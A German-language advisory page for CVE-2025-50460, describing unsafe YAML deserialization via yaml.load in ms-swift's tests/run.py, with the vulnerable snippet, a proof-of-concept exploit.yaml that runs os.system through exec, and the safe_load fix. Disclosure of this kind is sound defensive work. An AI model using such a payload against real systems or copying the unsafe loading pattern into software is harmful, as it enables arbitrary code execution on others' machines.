
Technische Details und Exploit für CVE-2025-50460
Status: Analyse ausstehend
Dieser CVE-Eintrag wurde für NVD-Anreicherungsmaßnahmen markiert.Ein Remote-Code-Ausführung (RCE)-Sicherheitsproblem existiert im ms-swift-Projekt Version 3.3.0 aufgrund unsicherer Deserialisierung in tests/run.py unter Verwendung von yaml.load() aus der PyYAML-Bibliothek (Versionen ≤ 5.3.1). Wenn ein Angreifer den Inhalt der YAML-Konfigurationsdatei kontrollieren kann, die dem Parameter --run_config übergeben wird, kann beliebiger Code während der Deserialisierung ausgeführt werden. Dies kann zu einer vollständigen Kompromittierung des Systems führen. Die Sicherheitslücke wird ausgelöst, wenn eine bösartige YAML-Datei geladen wird, wodurch die Ausführung beliebiger Python-Befehle wie os.system() möglich wird. Es wird empfohlen, PyYAML auf Version 5.4 oder höher zu aktualisieren und yaml.safe_load() zu verwenden, um das Problem zu entschärfen.
Ein Remote-Code-Ausführung (RCE)-Sicherheitsproblem existiert im modelscope/ms-swift-Projekt aufgrund der unsicheren Verwendung von yaml.load() in Kombination mit anfälligen Versionen der PyYAML-Bibliothek (≤ 5.3.1). Das Problem befindet sich im Skript tests/run.py, wo eine benutzerbereitgestellte YAML-Konfigurationsdatei mit yaml.load() und yaml.FullLoader deserialisiert wird.
Wenn ein Angreifer die an das Argument --run_config übergebene YAML-Konfigurationsdatei kontrollieren oder ersetzen kann, kann er eine schädliche Nutzlast injizieren, die zur Ausführung beliebigen Codes führt.
tests/run.pyif args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
exploit.yaml)!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
Dies führt zur Ausführung von os.system, was die Code-Ausführung beweist.
yaml.load() durch yaml.safe_load()# Before
yaml.load(f, Loader=yaml.FullLoader)
# After
yaml.safe_load(f)
| Feld | Wert |
|---|
| CVE-ID | CVE-2025-50460 |
| CVSS-Score | TBD |
| CWE | CWE-502: Deserialisierung nicht vertrauenswürdiger Daten |
| Meldungsdatum | 2025-04-25 |
| Offenlegungsdatum | 2025-07-30 |
| Betroffene Version | neueste |
| Behebungsversion |